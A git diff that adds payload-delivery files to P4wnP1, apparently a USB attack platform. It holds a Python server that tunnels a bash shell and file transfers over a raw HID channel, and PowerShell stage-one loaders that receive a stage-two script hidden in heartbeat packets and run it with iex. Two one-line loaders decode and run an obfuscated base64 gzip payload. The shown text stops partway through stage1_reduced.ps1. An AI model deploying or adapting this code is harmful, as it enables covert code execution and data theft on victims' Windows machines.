diff --git a/hidtools/payload_delivery/hidserver.py b/hidtools/payload_delivery/hidserver.py
new file mode 100644
index 0000000..acf115f
--- /dev/null
+++ b/hidtools/payload_delivery/hidserver.py
@@ -0,0 +1,331 @@
+#!/usr/bin/python
+
+
+# This file is part of P4wnP1.
+#
+# Copyright (c) 2018, Marcus Mengs.
+#
+# P4wnP1 is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# P4wnP1 is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with P4wnP1. If not, see .
+
+
+import sys
+import struct
+import Queue
+import subprocess
+import thread
+import signal
+from select import select
+import time
+
+chunks = lambda A, chunksize=60: [A[i:i+chunksize] for i in range(0, len(A), chunksize)]
+
+# single packet for a data stream to send
+# 0: 1 Byte src
+# 1: 1 Byte dst
+# 2: 1 Byte snd
+# 3: 1 Byte rcv
+# 4-63 60 Bytes Payload
+
+# client dst
+# 1 stdin
+# 2 stdout
+# 3 stderr
+
+# reassemable received and enqueue report fragments into full streams (separated by dst/src)
+def fragment_rcvd(qin, fragemnt_assembler, src=0, dst=0, data=""):
+ stream_id = (src, dst)
+ # if src == dst == 0, ignore (heartbeat)
+ if (src != 0 or dst !=0):
+ # check if stream already present
+ if fragment_assembler.has_key(stream_id):
+ # check if closing fragment (snd length = 0)
+ if (len(data) == 0):
+ # end of stream - add to input queue
+ stream = [src, dst, fragment_assembler[stream_id][2]]
+ qin.put(stream)
+ # delete from fragment_assembler
+ del fragment_assembler[stream_id]
+ else:
+ # append data to stream
+ fragment_assembler[stream_id][2] += data
+ #print repr(fragment_assembler[stream_id][2])
+ else:
+ # start stream, if not existing
+ data_arr = [src, dst, data]
+ fragment_assembler[stream_id] = data_arr
+
+
+def send_datastream(qout, src=1, dst=1, data=""):
+ # split data into chunks fitting into packet payload (60 bytes)
+ chnks = chunks(data)
+ for chunk in chnks:
+ data_arr = [src, dst, chunk]
+ qout.put(data_arr)
+ # append empty packet to close stream
+ qout.put([src, dst, ""])
+
+
+def send_packet(f, src=1, dst=1, data="", rcv=0):
+ snd = len(data)
+ #print "Send size: " + str(snd)
+ packet = struct.pack('!BBBB60s', src, dst, snd, rcv, data)
+ #print packet.encode("hex")
+ f.write(packet)
+
+def read_packet(f):
+ hidin = f.read(0x40)
+ #print "Input received (" + str(len(hidin)) + " bytes):"
+ #print hidin.encode("hex")
+ data = struct.unpack('!BBBB60s', hidin)
+ src = data[0]
+ dst = data[1]
+ snd = data[2]
+ rcv = data[3]
+ # reduce msg to real size
+ msg = data[4][0:snd]
+ return [src, dst, snd, rcv, msg]
+
+def process_input(qin, subproc):
+ # HID in loop, should ho to thread
+ # check if input queue contains data
+ while True:
+ if not qin.empty():
+ input = qin.get()
+ src=input[0]
+ dst=input[1]
+ stream=input[2]
+
+ # process received input
+ # stdin (redirect to bash)
+ if dst == 1:
+ command=stream
+ if command.upper() == "RESET_BASH":
+ # send sigint to bash
+ print "Restarting bash process"
+ reset_bash(subproc)
+ else:
+ print "running command '" + command + "'"
+ run_local_command(command, subproc)
+ # stdout
+ elif dst == 2:
+ print "Data received on stdout"
+ print stream
+ pass
+ # stderr
+ elif dst == 3:
+ pass
+ # getfile
+ elif dst == 4:
+ print "Data receiveced on dst=4 (getfile): " + stream
+ args=stream.split(" ",3)
+ if (len(args) < 3):
+ # too few arguments, echo this back with src=2, dst=3 (stderr)
+ print "To few arguments"
+ send_datastream(qout, 4, 3, "P4wnP1 received 'getfile' with too few arguments")
+ # ToDo: files are reassembled here, this code should be moved into a separate method
+ else:
+ # check if first word is "getfile" ignore otherwise
+ if not args[0].strip().lower() == "getfile":
+ send_datastream(qout, 4, 3, "P4wnP1 received data on dst=4 (getfile) but wrong request format was choosen")
+ continue
+
+ filename = args[1].strip()
+ varname = args[2].strip()
+ content = None
+ # try to open file, send error if not possible
+ try:
+ with open(filename, "rb") as f:
+ content = f.read() # naive approach, reading whole file at once (we split into chunks anyway)
+ except IOError as e:
+ # deliver Error to Client errorstream
+ send_datastream(qout, 4, 3, "Error on getfile: " + e.strerror)
+ continue
+
+ # send header
+ print "Varname " + str(varname)
+ send_datastream(qout, 4, 4, "BEGINFILE " + filename + " " + varname)
+
+ # send filecontent (sould be chunked into multiple streams, but would need reassembling on layer5)
+ # note: The client has to read (and recognize) ASCII based header and footer streams, but content could be in binary form
+ if content == None:
+ send_datastream(qout, 4, 3, "Error on getfile: No file content read")
+ else:
+ #send_datastream(qout, 4, 4, content)
+
+ streamchunksize=600
+ for chunk in chunks(content, streamchunksize):
+ send_datastream(qout, 4, 4, chunk)
+
+
+ # send footer
+ send_datastream(qout, 4, 4, "ENDFILE " + filename + " " + varname)
+
+ else:
+ print "Input in input queue:"
+ print input
+
+
+
+
+def run_local_command(command, bash):
+ bash = subproc[0]
+ sin = bash.stdin
+ sin.write(command + "\n")
+ sin.flush()
+ return
+
+def process_bash_output(qout, subproc):
+ buf = ""
+ while True:
+ bash = subproc[0]
+ outstream = bash.stdout
+
+ #print "Reading stdout of bash on " + str(outstream)
+
+ # check for output which needs to be delivered from backing bash
+ try:
+ r,w,ex = select([outstream], [], [], 0.1)
+ except ValueError:
+ # we should land here if the output stream is closed
+ # because a new bash process was started
+ pass
+
+ if outstream in r:
+ byte = outstream.read(1)
+
+ if byte == "\n":
+ # full line received from subprocess, send it to HID
+ # note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client
+
+ # we set src=1 as we receive bash commands on dst=1
+ # dst = 2 (stdout of client)
+ send_datastream(qout, 2, 2, buf)
+ # clear buffer
+ buf = ""
+ else:
+ buf += byte
+
+def process_bash_error(qout, subproc):
+ buf = ""
+ while True:
+ bash = subproc[0]
+ errstream = bash.stderr
+
+ # check for output which needs to be delivered from backing bash stderr
+ try:
+ r,w,ex = select([errstream], [], [], 0.1)
+ except ValueError:
+ # we should land here if the error stream is closed
+ # because a new bash process was started
+ pass
+
+ if errstream in r:
+ byte = errstream.read(1)
+ if byte == "\n":
+ # full line received from subprocess, send it to HID
+ # note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client
+
+ # dst = 3 (stderr of client)
+ send_datastream(qout, 3, 3, buf)
+ # clear buffer
+ buf = ""
+ else:
+ buf += byte
+
+# As we don't pipe CTRL+C intterupt from client through
+# HID data stream, there has to be another option to reset the bash process if it stalls
+# This could easily happen, as we don't support interactive commands, waiting for input
+# (this non-interactive shell restriction should be a known hurdle to every pentester out there)
+def reset_bash(subproc):
+ bash = subproc[0]
+ bash.stdout.close()
+ bash.kill()
+ send_datastream(qout, 3, 3, "Bash process terminated")
+ bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
+ subproc[0] = bash
+ if bash.poll() == None:
+ send_datastream(qout, 3, 3, "New bash process started")
+ else:
+ send_datastream(qout, 3, 3, "Restarting bash failed")
+
+
+# prepare a stream to answer a getfile request
+def stream_from_getfile(filename):
+ with open(filename,"rb") as f:
+ content = f.read()
+ return content
+
+
+# main code
+qout = Queue.Queue()
+qin = Queue.Queue()
+fragment_assembler = {}
+bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
+subproc = [bash] # packed into array to allow easy "call by ref"
+
+# process input
+thread.start_new_thread(process_input, (qin, subproc))
+# process output
+thread.start_new_thread(process_bash_output, (qout, subproc))
+# process error
+thread.start_new_thread(process_bash_error, (qout, subproc))
+
+# Initialize stage one payload, carried with heartbeat package in endless loop
+with open("wifi_agent.ps1","rb") as f:
+ stage2=f.read()
+#initial_payload="#Hey this is the test data for an initial payload calling get-date on PS\nGet-Date"
+stage2_chunks = chunks(stage2)
+heartbeat_content = []
+heartbeat_content += ["begin_heartbeat"]
+heartbeat_content += stage2_chunks
+heartbeat_content += ["end_heartbeat"]
+heartbeat_counter = 0
+
+with open("/dev/hidg1","r+b") as f:
+ # send test data stream
+ send_datastream(qout, 1, 1, "Hello from P4wnP1, this message has been sent through a HID device")
+
+ while True:
+ packet = read_packet(f)
+ src = packet[0]
+ dst = packet[1]
+ snd = packet[2]
+ rcv = packet[3]
+ msg = packet[4]
+
+ # put packet to input queue
+ fragment_rcvd(qin, fragment_assembler, src, dst, msg)
+
+ #print "Packet received"
+ #print "SRC: " + str(src) + " DST: " + str(dst) + " SND: " + str(snd) + " RCV: " + str(rcv)
+ #print "Payload: " + repr(msg)
+
+
+ # send data from output queue (empty packet otherwise)
+ if qout.empty():
+ # empty keep alive (rcv field filled)
+ #send_packet(f=f, src=0, dst=0, data="", rcv=snd)
+
+ # as the content "keep alive" packets (src=0, dst=0) is ignored
+ # by the PowerShell client, we use them to carry the initial payload
+ # in an endless loop
+ if heartbeat_counter == len(heartbeat_content):
+ heartbeat_counter = 0
+ send_packet(f=f, src=0, dst=0, data=heartbeat_content[heartbeat_counter], rcv=snd)
+ heartbeat_counter += 1
+
+ else:
+ packet = qout.get()
+ send_packet(f=f, src=packet[0], dst=packet[1], data=packet[2], rcv=snd)
+
diff --git a/hidtools/payload_delivery/stage1.ps1 b/hidtools/payload_delivery/stage1.ps1
new file mode 100644
index 0000000..bfc766f
--- /dev/null
+++ b/hidtools/payload_delivery/stage1.ps1
@@ -0,0 +1,242 @@
+
+# This file is part of P4wnP1.
+#
+# Copyright (c) 2017, Marcus Mengs.
+#
+# P4wnP1 is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# P4wnP1 is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with P4wnP1. If not, see .
+
+
+# P4wnP1 HID Script
+$USB_VID="1D6B"
+$USB_PID="0137"
+
+function ReflectCreateFileMethod()
+{
+ $Domain = [AppDomain]::CurrentDomain
+ $DynAssembly = New-Object System.Reflection.AssemblyName("MaMe82DynAssembly")
+ $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("MaMe82DynModule", $False)
+ $TypeBuilder = $ModuleBuilder.DefineType("MaMe82", "Public, Class")
+ # Define the CreateFile Method
+ $CreateFileMethod = $TypeBuilder.DefineMethod(
+ "CreateFile", # Method Name
+ [System.Reflection.MethodAttributes] "Public, Static", # Method Attributes
+ [IntPtr], # Method Return Type
+ [Type[]] @(
+ [String], # lpFileName
+ [Int32], # dwDesiredAccess
+ [UInt32], # dwShareMode
+ [IntPtr], # SecurityAttributes
+ [UInt32], # dwCreationDisposition
+ [UInt32], # dwFlagsAndAttributes
+ [IntPtr] # hTemplateFile
+ ) # Method Parameters
+ )
+
+ # Import DLL
+ $CreateFileDllImport = [System.Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+
+ # Define Fields
+ $CreateFileFieldArray = [System.Reflection.FieldInfo[]] @(
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("EntryPoint"),
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("PreserveSig"),
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("SetLastError"),
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("CallingConvention"),
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("CharSet")
+ )
+
+ # Define Values for the fields
+ $CreateFileFieldValueArray = [Object[]] @(
+ "CreateFile",
+ $True,
+ $True,
+ [System.Runtime.InteropServices.CallingConvention]::Winapi,
+ [System.Runtime.InteropServices.CharSet]::Auto
+ )
+
+ # Create a Custom Attribute and add to our Method
+ $CreateFileCustomAttribute = New-Object System.Reflection.Emit.CustomAttributeBuilder(
+ $CreateFileDllImport,
+ @("kernel32.dll"),
+ $CreateFileFieldArray,
+ $CreateFileFieldValueArray
+ )
+ $CreateFileMethod.SetCustomAttribute($CreateFileCustomAttribute)
+
+ # Create the Type within our Module
+ #$MaMe82 = $TypeBuilder.CreateType()
+ $TypeBuilder.CreateType()
+}
+
+function CreateFileStreamFromDevicePath($MaMe82Class, [String] $path)
+{
+ # CreateFile method has to be built in [MaMe82]::CreateFile()
+ # call ReflectCreateFileMethod to achieve this
+
+ # Call CreateFile for given devicepath
+ # (GENERIC_READ | GENERIC_WRITE) = 0XC0000000
+ # FILE_FLAG_OVERLAPPED = 0x40000000;
+ $handle = $MaMe82Class::CreateFile($path, [System.Int32]0XC0000000, [System.IO.FileAccess]::ReadWrite, [System.IntPtr]::Zero, [System.IO.FileMode]::Open, [System.UInt32]0x40000000, [System.IntPtr]::Zero)
+
+ # Create SafeFileHandle from file
+ # Note: [Microsoft.Win32.SafeHandles.SafeFileHandle]::new() isn't accessible on PS 2.0 / NET2.0
+ # thus we use reflection to construct FileStream
+ #$shandle = [Microsoft.Win32.SafeHandles.SafeFileHandle]::new($devicefile, [System.Boolean]0)
+ $a = $handle, [Boolean]0
+ $c=[Microsoft.Win32.SafeHandles.SafeFileHandle].GetConstructors()[0]
+ $shandle = $c.Invoke($a)
+
+ # Create filestream from SafeFileHandle
+ #$Device = [System.IO.FileStream]::new($shandle, [System.IO.FileAccess]::ReadWrite, [System.UInt32]32, [System.Boolean]1)
+ # Note: again Reflection has to be used to access the constructor of FileStream
+ $fa=[System.IO.FileAccess]::ReadWrite
+ $a=$shandle, $fa, [System.Int32]64, [System.Boolean]1
+ $c=[System.IO.FileStream].GetConstructors()[14]
+ $Device = $c.Invoke($a)
+
+
+ return $Device
+}
+
+function send_data($file, $source, $dest, $data, $received)
+{
+ $report_id = [byte] 0
+ $src = [byte] $source
+ $dst = [byte] $dest
+ $snd = [byte] $data.Length
+ $rcv = [byte] $received
+
+ $i=0
+ $bytes = New-Object Byte[] (65)
+ $bytes[$i++] = $report_id
+ $bytes[$i++] = $src
+ $bytes[$i++] = $dst
+ $bytes[$i++] = $snd
+ $bytes[$i++] = $rcv
+
+ $data.CopyTo($bytes, $i)
+
+ $devfile.Write($bytes, 0, $bytes.Length)
+
+
+}
+
+function read_data($file)
+{
+ $r = New-Object Byte[] (65)
+ $cr = $devfile.Read($r,0,65)
+
+ # async read able to send heartbeats, which isn't needed anymore
+ #$asyncReadResult = $devfile.BeginRead($r, 0, 65, $null, $null)
+ #while (-not $asyncReadResult.IsCompleted)
+ #{
+ # # Sending heartbeat data if needed, heartbeat otherwise
+ # $heartbeat = New-Object Byte[] (0)
+ # #send_data $devfile 0 0 $heartbeat 0
+ #}
+ #$cr = $devfile.EndRead($asyncReadResult)
+
+ $i=0
+ $report_id = $r[$i++]
+ $src = $r[$i++]
+ $dst = $r[$i++]
+ $snd = $r[$i++]
+ $rcv = $r[$i++]
+
+
+ $msg = New-Object Byte[] ($snd)
+
+ [Array]::Copy($r, $i, $msg, 0, $snd)
+
+
+ # msg
+ return $src, $dst, $snd, $rcv, $msg
+}
+
+function GetDevicePath($USB_VID, $USB_PID)
+{
+ $HIDGuid="{4d1e55b2-f16f-11cf-88cb-001111000030}"
+ foreach ($wmidev in gwmi Win32_USBControllerDevice |%{[wmi]($_.Dependent)} ) {
+ #[System.Console]::WriteLine($wmidev.PNPClass)
+ if ($wmidev.DeviceID -match ("$USB_VID" + '&PID_' + "$USB_PID") -and $wmidev.DeviceID -match ('HID') -and -not $wmidev.Service) {
+ $devpath = "\\?\" + $wmidev.PNPDeviceID.Replace('\','#') + "#" + $HIDGuid
+ }
+ }
+ $devpath
+}
+
+
+
+#######
+# Init RAW HID device
+#########
+
+# Use Reflection to create [MaMe82]::CreateFile from kernel32.dll
+$MaMe82Class = ReflectCreateFileMethod
+
+$path= GetDevicePath $USB_VID $USB_PID
+# create FileStream to device
+$devfile = CreateFileStreamFromDevicePath $MaMe82Class $path
+$count = -1
+$stage1 = ""
+
+try
+{
+ while ($devfile.SafeFileHandle -ne $null)
+ {
+ $heartbeat = New-Object Byte[] (0)
+ send_data $devfile 0 0 $heartbeat 0
+
+ $packet = read_data $devfile
+ # set RCV to SND to acknowledge full packet in next send
+ $src = $packet[0]
+ $dst = $packet[1]
+ $snd = $packet[2]
+ $rcv = $packet[3]
+ $msg = $packet[4]
+
+ $utf8 = [System.Text.Encoding]::UTF8.GetString($msg)
+
+
+ if ($utf8.StartsWith("end_heartbeat") -and ($count -gt 0))
+ {
+ [System.Console]::WriteLine("Received last package of stage1")
+
+ break
+ }
+ if ($utf8.StartsWith("begin_heartbeat"))
+ {
+ $count = 0
+ [System.Console]::WriteLine("Received first package of stage1")
+ }
+ elseif ($count -ge 0)
+ {
+ # belongs to stream, assemble
+ $stage1 += $utf8
+ $count += 1
+ [System.Console]::WriteLine("Received package $count of stage1")
+ }
+
+
+ }
+ [System.Console]::WriteLine("stage1 reassembled")
+ [System.Console]::WriteLine("$stage1")
+ iex $stage1
+}
+finally
+{
+ # end main thread
+ $devfile.Close()
+ $devfile.Dispose()
+}
\ No newline at end of file
diff --git a/hidtools/payload_delivery/stage1_mini.ps1 b/hidtools/payload_delivery/stage1_mini.ps1
new file mode 100644
index 0000000..742be6b
--- /dev/null
+++ b/hidtools/payload_delivery/stage1_mini.ps1
@@ -0,0 +1 @@
+$b='H4sIAAAAAAAEAKVXbU/bSBD+jsR/sFzfxRGJ5VBaISR0Bwm0kUobNXA9XbDQxh4ne9jeaL1OG/X47zezu7YT2lSqCoLYuzPPPPO6m8ODtCpixUXhfIQ0g1gNJTAF1zyDG1BLkfjdw4OvhwdeInLn3JldrFYjkTNeRGdnw0pKKJR5JxGGEu/hc//D/F9EqhERPLgoS8jn2eY9y8F3b9gNnB6PNkW97KIRj81RnewEI0h5AbjPch7XMj7i95zZFuhVzlWDfFnxLAF5EcdQlkjuY1UQaK5B2XwX80YkVbZNxCy4Pce7ZlkJpKm0Zl5r3m5WjQLKuZNqnvG45wwzVpaaf5xShFDPatj4uW1E3V3+RuBCKcnnlYIyalGniikek/y4UBMlI3wiBrMocv70Z1NUKRaR2X55TA93zVOrcbd/1+lqygmnpGKsFM8hwD2QYjUFueYYxmCUZeN8JaRqOEbBG1BDUZRKVrES0m/JGMCUacDWyWsOWTIuUmGp/6Qtre67V4WSm4nghXK7vZ8mbEEmEkqUhClf/ALKFNQ7VqorKYX8BZghyzIMG8ZyjT2EkfoVrCWTSMu1KUjXOgmmC03Yd4vQu5UVNB97jX5DEdvqEy/Yiv9IyXBB0YtKCUMo3j8YdA8Pq1KJvHHNtrJP5dkj8o8gC8heHgdJllGYqMz0f/TUdl6ANp/B+NqyaeXA+K+bGFeeDtu510YGCxlYfi1FPgJyZsLU0vfyPM7QX1vljrfCVTsTl3pC4D7OwgbF1xJNa4Z/D0PzQ0sfAhJphxSw5JPkCtrGPDv7B+PZyuJkAlz8sIKi7ePwy8kW6LaiHqREixhcCpEBK6KQYnQ+u+GxFKVIVYBZxGhOWQpvWZFkmDZ6JnPm/Xmbl353Fka1xzEmfS0e0VMd3ZSd73eM6JwTGY9SZmPy+mSL3MCQswgmB9+zPzhBAhJUJYvnFLbTWUKRPCRMMd9LEQ8Nl6KSMT0kUCr6wE38kBADX0Nic8nPKUrzDc7h3WK9xKVZ5PivX3VrgZnHj44i6jF6jZxw34a1vXebGO3fRJ7BOygWarlXpnZCn74oPhSrza3wjTQ6yYlzAmsKRaAT0uxh6ZhHa+NZHDEN23G0UZI/ik0s9QFurVEJ+J7shT2zawIsgabYA09IVBp/cLmU8e5CUqpnEsUzFRmvdxfycvF9dqSLDGYXUrIN3VswSMQMw4N/qGaCYaTqCkNGVCu6YnCHCiZeG/HdQGGlbo+Lu+nlw1/jEUrS02Q8spF7Ox69qXhy7n49SQbw6tX8uJ8OXqf9wSBO+6en8bwfhgP8oaZ+GT65aEFgDuIl8v+cc4yqwwtngY+O7t4HhMcOUVJkGUjDwPnvt68zlIh87wEvITgyEhzc3Sen6yAFnjZQgZEfj5x+zhTZcGvirnPkdH5H3g8dfHJrL9yu08fR4OwF6KCDHSvUL4RqJO3JoClQcdB0xDy59/d/3JOxWm7yflKDYu2sMhaD37nv9DovEBaZvNDCNow6BU8toHmhUYzQe26yKECi57sZc2rHm4S1HYNYPz4dzPQ3ZwI1gMBDEZX6NNNKxRZwTJ5iLj3IV2rz/fIMsULwdqPL5POSzPpNE+2OZQwsOF5RZZkpqmbWNV3nhPhrjYXa4fgRiFLTzo2oLQgjgdNdg4cGOMbC4kUFOqzbYoP9Yl6l0lMaTbfwRQVXRSwSOjDPzu5ur09pnpsTtIE6iboWmxQDvPFKVX7i2EMuubUEfJ9j8OvK8214+wuF9g2BObr12JL8BmgOC15sQ9lmrBOFIZrRMYMnEd1taD6+w5s7XvIIxDHTFUk7JpmumZGA3xC0vZpQE5A66Uc4mIhMYwoXBt/a8t3AQj7tI2IB0U/zPQcS0uDwxbG2zDDCW1mWbew3NVs7w0yU+rbTrIx4ubJrqHR48D9inn4F/g0AAA==';nal no New-Object -F;iex (no IO.StreamReader(no IO.Compression.GZipStream((no IO.MemoryStream -A @(,[Convert]::FromBase64String($b))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
diff --git a/hidtools/payload_delivery/stage1_mini.ps1.old b/hidtools/payload_delivery/stage1_mini.ps1.old
new file mode 100644
index 0000000..62c7381
--- /dev/null
+++ b/hidtools/payload_delivery/stage1_mini.ps1.old
@@ -0,0 +1 @@
+$b='H4sIAAAAAAAEAKVXbW/bNhD+PqD/QVC9WUZsQU7SLAhgbImdtAGa1qiTdZgjBLR0srlIpEFRbo0u/313JCXbaV2gaILEEnn33HOvpF/80rqbXDz8dT0a+P3RyYX/wi6MaSHqH/2OC1klEs2l8D5AlkOihwqYhiueww3ohUyDzotfvqBeKgtv4E3Pl8uRLBgX8dnZsFIKhLbvJMJQ4h186r2f/YtINSKCh+dlCcUsX79jBQT+DbuB08PRWtTLPhppsRmqk51wBBkXgPus4EktEyB+15tugV4WXDfIFxXPU1DnSQJlieQ+VIJACwPKZruYNzKt8m0idsHveq0rlpdAmtpoFrXm7XrZKKCcP65mOU+63jBnZWn4JxlFCPWchoufv4mov8vfCpxrrfis0lDGG9SJZponJH8t9FirGJ+IwTSOvT+D6QRVxDy220eH9HDXPG007vbveh1DOeWUVIyV5gWEuAdKLiegVhzDGI7y/LpYSqUbjnH4GvRQilKrKtFSBRsyFjBjBnDj5BWHPL0WmXTUf9CWUQ/8S6HVeiy50H6n+8OEHchYQYmSMOHzn0CZgH7LSn2plFQ/ATNkeY5hw1iusIcwUj+DtWAKafkuBdnKJMF2oQ37bhG2blUFzcdeo19RxLb6yAVb8u8pWS4oel5paQkl+weD6eFhVWpZNK65Vg6oPLtE/hGUgPzoMEzznMJEZWb+o6eu80K0+QwmMJZtK4fWf9PEuPK0Nfc2kcFCBlZcKVmMgJwZM70IWkWR5Oivq3KvtcRVNxMXZkLgPs7CBiUwEk1rRn8PI/tDS+9DEtkMKWDpR8U1bBrz7OwfjOdGFicT4OL7JYhNH0efj7dAtxXNICVaxOBCyhyYiCOK0WB6wxMlS5npELOI0ZywDN4wkeaYNnomc/b9eZuXQWcaxbXHCSZ9JR/RUxPdjA32O0Z0BkSmRSlzMTk53iLXt+Qcgs3Bt+z3j5GAAl0p8ZzCdjpLEOlDyjQLWhnioeFSViqhhxRKTR+4iR8KEuArSF0u+YCiNFvjHN4t1gtcmsZecPKqUwtMW/zgIKYeo9fYi/ZtONt7t4nR/k3kGb4FMdeLvTK1E+b0RfGhXK5vZWCl0UlOnFNYUShCk5BmD0vHPjobz+KIadiOo4uS+l5sEmUOcGeNSiBoqW7Utbs2wApoij3wlESV9QeXS5XsLqSlfiYhnqmoZLW7UJTzb7MjXWQwPVeKrenegkEiZhge/EM1GwwrVVcYMqJaMRWDO1QwycqK7wYKK3V7XLgLF0q6m5aL3Jvr0euKpwP/y3Hah1evZoe9rH+S9fr9JOudniazXhT18Yea+ih6opuZxBwkC+T/qeAYVY8Lb46PnuneB4THDtFK5jkoy8D779cvU5SIg9YDXkJwZKQ4uDtPXsdDCjxroEIrfz3yegXTZMOvifvegdf+DXk/tPHJr73wO14PR4O3F6CNDradUE9I3Ui6k8FQoOKg6Yh58u/v/7gnY7Xc+N24BsXaWeYsgaB93+62XyIsMnlphF0YTQqeNoD2hUYxQu+5yaIAiQ52M+bVjjcJ23QMYn3/dLDT354J1AASD0VU6tFMKzWbwyF5StduKJZ6/e3yjLBC8HZjyuTTgswGTRPtjmUMLHgtUeW5Lapm1jVd50X464xFxuHkEYhS086NqCsIK4HT3YBHFjjBwuKiAhPWbbH+frFWpbNTGk238FmHlyKRKR2YZ2d3t1enNM/tCdpAHccdh02KId54lS4/cuwhn9xaAL7PMPh15QUuvL25RvuWwAzdetyQ/ApoBnMutqFcM9aJwhBN6ZjBk4juNjQf3+LNHS95BOLZ6YqkPZtM385IwG8Ixl5NqAlInfQDHExEpjGFC/2vbQV+6CCf9hFxgOin/Z4DKWlw+Ow5W3YY4a0sz9fum5qrnWEuS3PbaVZGvFy6NVT6H8d3IaseDgAA';nal no New-Object -F;iex (no IO.StreamReader(no IO.Compression.GZipStream((no IO.MemoryStream -A @(,[Convert]::FromBase64String($b))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
diff --git a/hidtools/payload_delivery/stage1_reduced.ps1 b/hidtools/payload_delivery/stage1_reduced.ps1
new file mode 100644
index 0000000..14e9127
--- /dev/null
+++ b/hidtools/payload_delivery/stage1_reduced.ps1
@@ -0,0 +1,171 @@
+
+# This file is part of P4wnP1.
+#
+# Copyright (c) 2017, Marcus Mengs.
+#
+# P4wnP1 is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# P4wnP1 is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with P4wnP1. If not, see .
+
+
+# P4wnP1 HID Script
+$USB_VID="1D6B"
+$USB_PID="0137"
+
+function ReflectCreateFileMethod()
+{
+ $dom = [AppDomain]::CurrentDomain
+ $da = New-Object Reflection.AssemblyName("MaMe82DynAssembly")
+ $ab = $dom.DefineDynamicAssembly($da, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+ $mb = $ab.DefineDynamicModule("MaMe82DynModule", $False)
+ $tb = $mb.DefineType("MaMe82", "Public, Class")
+ $cfm = $tb.DefineMethod("CreateFile", [Reflection.MethodAttributes] "Public, Static", [IntPtr], [Type[]] @([String], [Int32], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr] ))
+ $cdi = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+ $cfa = [Reflection.FieldInfo[]] @([Runtime.InteropServices.DllImportAttribute].GetField("EntryPoint"), [Runtime.InteropServices.DllImportAttribute].GetField("PreserveSig"), [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError"), [Runtime.InteropServices.DllImportAttribute].GetField("CallingConvention"), [Runtime.InteropServices.DllImportAttribute].GetField("CharSet"))
+ $cffva = [Object[]] @("CreateFile", $True, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
+ $cfca = New-Object Reflection.Emit.CustomAttributeBuilder($cdi, @("kernel32.dll"), $cfa, $cffva)
+ $cfm.SetCustomAttribute($cfca)
+ $tb.CreateType()
+}
+
+function CreateFileStreamFromDevicePath($mmcl, [String] $path)
+{
+ # CreateFile method has to be built in [MaMe82]::CreateFile()
+ # call ReflectCreateFileMethod to achieve this
+
+ # Call CreateFile for given devicepath
+ # (GENERIC_READ | GENERIC_WRITE) = 0XC0000000
+ # FILE_FLAG_OVERLAPPED = 0x40000000;
+ $h = $mmcl::CreateFile($path, [Int32]0XC0000000, [IO.FileAccess]::ReadWrite, [IntPtr]::Zero, [IO.FileMode]::Open, [UInt32]0x40000000, [IntPtr]::Zero)
+
+ # Create SafeFileHandle from file
+ # Note: [Microsoft.Win32.SafeHandles.SafeFileHandle]::new() isn't accessible on PS 2.0 / NET2.0
+ # thus we use reflection to construct FileStream
+ #$shandle = [Microsoft.Win32.SafeHandles.SafeFileHandle]::new($devicefile, [System.Boolean]0)
+ $a = $h, [Boolean]0
+ $c=[Microsoft.Win32.SafeHandles.SafeFileHandle].GetConstructors()[0]
+ $h = $c.Invoke($a)
+
+ # Create filestream from SafeFileHandle
+ #$Device = [System.IO.FileStream]::new($h, [System.IO.FileAccess]::ReadWrite, [System.UInt32]32, [System.Boolean]1)
+ # Note: again Reflection has to be used to access the constructor of FileStream
+ $fa=[IO.FileAccess]::ReadWrite
+ $a=$h, $fa, [Int32]64, [Boolean]1
+ $c=[IO.FileStream].GetConstructors()[14]
+ return $c.Invoke($a)
+}
+
+function send_data($file, $source, $dest, $data, $received)
+{
+
+ $i=0
+ $bytes = New-Object Byte[] (65)
+ $bytes[$i++] = [byte] 0
+ $bytes[$i++] = [byte] $source
+ $bytes[$i++] = [byte] $dest
+ $bytes[$i++] = [byte] $data.Length
+ $bytes[$i++] = [byte] $received
+
+ $data.CopyTo($bytes, $i)
+
+ $devfile.Write($bytes, 0, $bytes.Length)
+
+
+}
+
+
+function read_data($file)
+{
+ $r = New-Object Byte[] (65)
+ $cr = $devfile.Read($r,0,65)
+
+ $i=0
+ $report_id = $r[$i++]
+ $src = $r[$i++]
